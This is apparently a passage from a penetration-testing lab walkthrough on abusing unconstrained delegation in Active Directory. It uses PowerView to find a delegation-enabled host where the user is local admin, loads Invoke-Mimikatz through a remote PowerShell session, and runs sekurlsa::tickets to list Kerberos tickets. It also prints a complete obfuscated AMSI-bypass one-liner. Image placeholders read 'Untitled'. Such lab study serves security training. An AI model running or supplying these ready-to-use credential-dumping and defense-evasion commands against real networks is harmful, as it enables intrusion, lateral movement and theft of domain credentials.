now enumerating the computers which have unconstrained delegation enabled

. .\\powerview.ps1
Get-NetComputer -Unconstrained

Untitled

as we see we have the computer WIN-Q4788GPE9L7 with unconstrained delegation enabled

Find-LocalAdminAccess

Untitled

now as we see our user have local admin access to at the computer with unconstrained delegation

so let’s abuse this now and try to dump it’s secrets

Enable-PSRemoting
$sess = New-PSSession -ComputerName WIN-Q4788GPE9L7
Invoke-Command -FilePath ..\\..\\rem01x.crtp\\Desktop\\tools\\Invoke-Mimikatz.ps1 -Session $sess
Enter-PSSession -Session $sess

now let’s bypass AMSI

S`eT-It`em ( 'V'+'aR' +  'IA' + ('blE:1'+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile')  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )

Untitled

now let’s try to dump the secrets

now let’s list all the available tickets

Invoke-Mimikatz -Command '"sekurlsa::tickets"'

Untitled